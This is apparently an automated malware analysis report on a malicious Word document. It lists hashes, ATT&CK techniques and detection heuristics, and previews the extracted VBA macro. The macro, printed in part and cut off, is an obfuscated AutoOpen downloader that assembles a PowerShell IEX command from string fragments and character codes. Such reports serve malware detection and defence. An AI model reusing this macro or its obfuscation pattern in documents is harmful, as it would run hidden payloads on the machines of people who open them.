Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fd8c110fd0b7b3a8…

MALICIOUS

Office (OLE)

Size: 107.2 KB
Created: 2018-06-21 12:06:00
Authoring application: Microsoft Office Word
First seen: 2018-08-05
MD5: 944e2e68894e462dc0c96f67007cce4b
SHA-1: 3523571755afb6e058667d4fc8ade9cac3aa2399
SHA-256: fd8c110fd0b7b3a8a50fa473ad9b3518b8c4e83875266da9b90ee25f749fb9a0
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059.001 PowerShell
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. The macro uses a Shell() call to execute a PowerShell command assembled from concatenated string fragments. The reconstructed command appears to be 'powershell IEX("120,115 , 97 ,59,121, 116 , 124 ,115 , 117,98,54 , 100 , 103 , 114, 121, 114, 111, 119, 46, 99, 111, 109, 47, 115, 116, 97, 114, 116, 117, 112, 46, 112, 115, 53")', which likely downloads and executes a second-stage payload. The combination of an AutoOpen macro and a Shell() call strongly indicates malicious intent.

Heuristics 7

  • ClamAV: Doc.Malware.Valyria-6797998-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6797998-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename    | Kind       | Source                                                    | Size
macros.bas  | vba-macro  | oletools.olevba.extract_macros (decoded VBA source)       | 17358 bytes
SHA-256: 80b754a96fbcd0b16e4bf61683e38bcbc7f44536858da66ac68c7cebe56c864d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "KEEibrmckjQiP"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "KlbsIzDzno"
Function KQwHrkTIVY()
On Error Resume Next
For Each sZtXMk In wVCRsq
wqJRw = (JMXzM * 90041 + 60024 * CInt(ADqYa - CDbl(63204)) * 52220 * Oct(89350))
YanviL = zBhcTD = FYjjj
uKRFZ = 95972 + Atn(34607) / 22880 / Round(87179) / 34626 / CInt(iDNlr)
Next
MtrpXlk = "OwerSHe" + "ll IEX(" + "[Str" + "ing]::jOin"
For Each baBsB In NCwwi
zrAvsj = (IiVkt * 36779 + 8006 * CInt(XtPqjO - CDbl(26510)) * 15981 * Oct(11652))
JswECb = jbtaJ = LiXjcF
HZzcpJ = 66889 + Atn(11250) / 98229 / Round(43234) / 72388 / CInt(uQiqOD)
Next
WoUni = "( '',((50 , 10" + "3, 124 ,121," + "67 ," + "68 ,120,5" + "4 , 43, " + "54, "
For Each ujJrKI In FDMLi
CQXkvW = (tsvkE * 15907 + 83521 * CInt(XdnIf - CDbl(92929)) * 21158 * Oct(11826))
hnTbDf = nrAjdt = usomBn
mBRwi = 50691 + Atn(47414) / 5884 / Round(99166) / 78960 / CInt(KZCICn)
Next
pnjfU = "120,115 , 97 ," + "59,121, 116 , 1" + "24 ,115 , 1" + "17,9" + "8,5" + "4 , 10"
For Each NCzNIL In iftQqJ
SYulC = (UEUksL * 77433 + 37473 * CInt(vmpBw - CDbl(77710)) * 72369 * Oct(54798))
tFMEv = mJfisA = XAKVI
MVwWSJ = 68554 + Atn(12659) / 51022 / Round(78751) / 24181 / CInt(jvVrw)
Next
wiROvT = "0 , 1" + "19, 1" + "20,114, 12" + "1 ,123, 45,5"
For Each QJpzi In FbTnPp
bfEPEz = (uuLYMU * 36613 + 26965 * CInt(EmfDt - CDbl(10010)) * 98238 * Oct(85597))
mRRqq = rkwlpc = QuNWVw
lOMrQ = 28095 + Atn(2541) / 68193 / Round(73801) / 93860 / CInt(jLASf)
Next
PRLwqGuaw = "0,99, 69," + " 79, 8" + "1, 82,54" + " , 43 , 54,12" + "0,11"
For Each DEPhb In hYiYV
pXjAci = (Eaabu * 14878 + 96922 * CInt(OIRjw - CDbl(27076)) * 92546 * Oct(37384))
iiJsi = hpfzw = mfjWu
rccVad = 39974 + Atn(36997) / 31957 / Round(34138) / 85809 / CInt(XtDSS)
Next
jiAFRPz = "5,97 , 59, " + "121," + "116,124,115," + " 117 , 98" + ", 5" + "4, 69,1" + "11,10" + "1,98, 11"
For Each UfaHtl In KBbcc
JDmErp = (IjXLB * 29793 + 94918 * CInt(ZDVUN - CDbl(78899)) * 3397 * Oct(28808))
jiqGP = srnjiT = pMcFln
OFioH = 70076 + Atn(97513) / 12655 / Round(14132) / 30165 / CInt(IolUIw)
Next
luJmFwbH = "5 , 123 ," + " 56,88 ,1" + "15, 98 , 5" + "6, 65, 115" + ", 116 , 8" + "5, " + "12" + "2 "
KQwHrkTIVY = MtrpXlk + WoUni + pnjfU + wiROvT + PRLwqGuaw + jiAFRPz + luJmFwbH
End Function
Function fYDPD()
On Error Resume Next
For Each sFiUN In OooOIr
DOHmi = (Bzfcm * 68993 + 46549 * CInt(aizUEd - CDbl(97003)) * 87439 * Oct(65449))
urwZSv = zPIpth = qEzHMc
kpooJp = 87767 + Atn(8594) / 26930 / Round(17630) / 18712 / CInt(drmGcj)
Next
oEXVswSAR = ",127" + ",115 ,120,98" + " , 45" + ", 50,6" + "7 ,123"
For Each roUQBj In Aizjqj
kKBJl = (GrtBw * 61567 + 26421 * CInt(HDwVb - CDbl(56166)) * 71180 * Oct(8182))
ZnHNo = EhSdb = hkwqXd
uSRVS = 85776 + Atn(86692) / 51005 / Round(3513) / 22807 / CInt(DUjuc)
Next
KLBpf = ",9" + "9 , 112" + ", " + "71, 5" + "4 ,"
For Each ivRbp In jCmKZ
BiDzk = (wISoU * 91947 + 78809 * CInt(VDZGM - CDbl(74823)) * 16271 * Oct(51083))
cLZFw = SjhTHA = LDjWzT
paVmm = 98140 + Atn(55348) / 55798 / Round(60880) / 95802 / CInt(KbSboK)
Next
Avzoh = "43," + " 5" + "4 , 49 , 126 , " + "98, 98 ,102," + "44 " + ", 57 ,57, 98,11"
For Each wXAIm In hCosWX
poXWBp = (TzIpAk * 62259 + 94634 * CInt(OkOZT - CDbl(98955)) * 92964 * Oct(5410))
ntFjKk = IHzVD = ZwXkwP
HCwkd = 49115 + Atn(14876) / 14456 / Round(95822) / 43751 / CInt(sUpOwh)
Next
PwzJQRvc = "0 , 12" + "4, 113," + " 119," + " 97, 116 ," + "123 , 5" + "6," + " 117,1"
For Each oXirci In VSKQBi
jrZlz = (GldzK * 71315 + 15220 * CInt(jGLCqA - CDbl(19085)) * 84548 * Oct(54705))
aNIIG = rwnoLc = dzMdD
jhrazl = 23432 + Atn(99160) / 27556 / Round(20948) / 66066 / CInt(pPJKjM)
Next
LUEhT = "21 ,123 , 57 " + ",68,122 , 1" + "14, 94 , " + "35 ,"
fYDPD = oEXVswSAR + KLBpf + Avzoh + PwzJQRvc + LUEhT
End Function
Function zVMCZXrS()
On Erro
... (truncated)